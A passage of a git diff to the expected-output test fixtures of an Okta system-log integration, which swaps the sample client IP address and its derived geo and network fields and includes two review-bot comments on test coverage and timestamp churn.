Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in 
ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}"
 }
 ]
 }
\ No newline at end of file
diff --git a/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json-expected.json b/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json-expected.json
index 0775b72e9ec..4c6d7c3f506 100644
--- a/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json-expected.json
+++ b/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json-expected.json
@@ -3,28 +3,27 @@
 {
 "source": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Dublin",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "California",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_name": "China",
+ "region_name": "Jilin",
 "location": {
- "lon": -121.919,
- "lat": 37.7201
- }
+ "lon": 125.3228,
+ "lat": 43.88
+ },
+ "country_iso_code": "CN"
 },
 "as": {
- "number": 7018,
+ "number": 4837,
 "organization": {
- "name": "AT\u0026T Services, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "user": {
 "full_name": "xxxxxx",
 "id": "00u1abvz4pYqdM8ms4x6"
 },
- "ip": "108.255.197.247"
+ "ip": "175.16.199.1"
 },
 "tags": [
 "preserve_original_event"
@@ -38,7 +37,7 @@
 "xxxxxx"
 ],
 "ip": [
- "108.255.197.247"
+ "175.16.199.1"
 ]
 },
 "client": {
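Review bot: The new expected `source.geo` block drops `city_name` with no replacement (the old side asserted `"city_name": "Dublin"`), so after this change the pipeline test no longer verifies city-level GeoIP enrichment at all; if that field matters for the data stream, a test address that the bundled GeoIP test database resolves to city level would keep that coverage. The `location`, `as.number` and `as.organization.name` values on the plus side appear to be whatever that bundled database returns for 175.16.199.1, so the fixture is now pinned to that database's contents — a one-line note in the test directory's README or the PR description saying so would spare the next maintainer a puzzled regeneration. `event.original` still carries the Okta-supplied `geographicalContext` of Dublin, California with the old coordinates, so the sample now describes a client whose own metadata and IP-derived geo disagree; harmless for an ingest-pipeline test, but worth a sentence if this fixture doubles as a documentation sample. The same `ip` substitution recurs in the `@@ -38,7 +37,7 @@` hunk on this line and in the `@@ -55,11 +54,11 @@` hunk, which continues past the end of this view.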
@@ -55,11 +54,11 @@ "full_name": "xxxxxx", "id": "00u1abvz4pYqdM8ms4x6" }, - "ip": "108.255.197.247" + "ip": "175.16.199.1" }, "event": { - "ingested": "2021-06-14T07:17:41.693715800Z", - "original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", + "ingested": "2021-12-09T13:42:54.417340700Z", + "original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from 
Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to 
Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in 
ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", "kind": "event", "action": "user.session.end", "id": "faf7398a-4f77-11ea-97fb-5925e98228bd", @@ -102,7 +101,7 @@ "raw_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", "browser": "FIREFOX" }, - "ip": "108.255.197.247" + "ip": "175.16.199.1" }, "uuid": "faf7398a-4f77-11ea-97fb-5925e98228bd", "outcome": { 
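Review bot: `event.ingested` moves from `2021-06-14T07:17:41.693715800Z` to `2021-12-09T13:42:54.417340700Z` in this hunk, which is regeneration noise unrelated to the address substitution and will reappear on every future `-expected.json` refresh. If the pipeline test config for this data stream does not already list `event.ingested` under `dynamic_fields`, adding it there would keep such diffs limited to meaningful changes; the same churn appears in the hunks at -185 and -315. The substitution itself looks complete: each `ipAddress` and `ipChain[].ip` value inside `event.original` is replaced, matching the top-level `ip` fields changed in the neighbouring hunks.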
@@ -133,28 +132,27 @@
 {
 "source": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Dublin",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "California",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_name": "China",
+ "region_name": "Jilin",
 "location": {
- "lon": -121.919,
- "lat": 37.7201
- }
+ "lon": 125.3228,
+ "lat": 43.88
+ },
+ "country_iso_code": "CN"
 },
 "as": {
- "number": 7018,
+ "number": 4837,
 "organization": {
- "name": "AT\u0026T Services, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "user": {
 "full_name": "xxxxxx",
 "id": "00u1abvz4pYqdM8ms4x6"
 },
- "ip": "108.255.197.247"
+ "ip": "175.16.199.1"
 },
 "tags": [
 "preserve_original_event"
@@ -168,7 +166,7 @@
 "xxxxxx"
 ],
 "ip": [
- "108.255.197.247"
+ "175.16.199.1"
 ]
 },
 "client": {
@@ -185,11 +183,11 @@ "full_name": "xxxxxx", "id": "00u1abvz4pYqdM8ms4x6" }, - "ip": "108.255.197.247" + "ip": "175.16.199.1" }, "event": { - "ingested": "2021-06-14T07:17:41.693743800Z", - "original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", + "ingested": "2021-12-09T13:42:54.417349900Z", + "original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 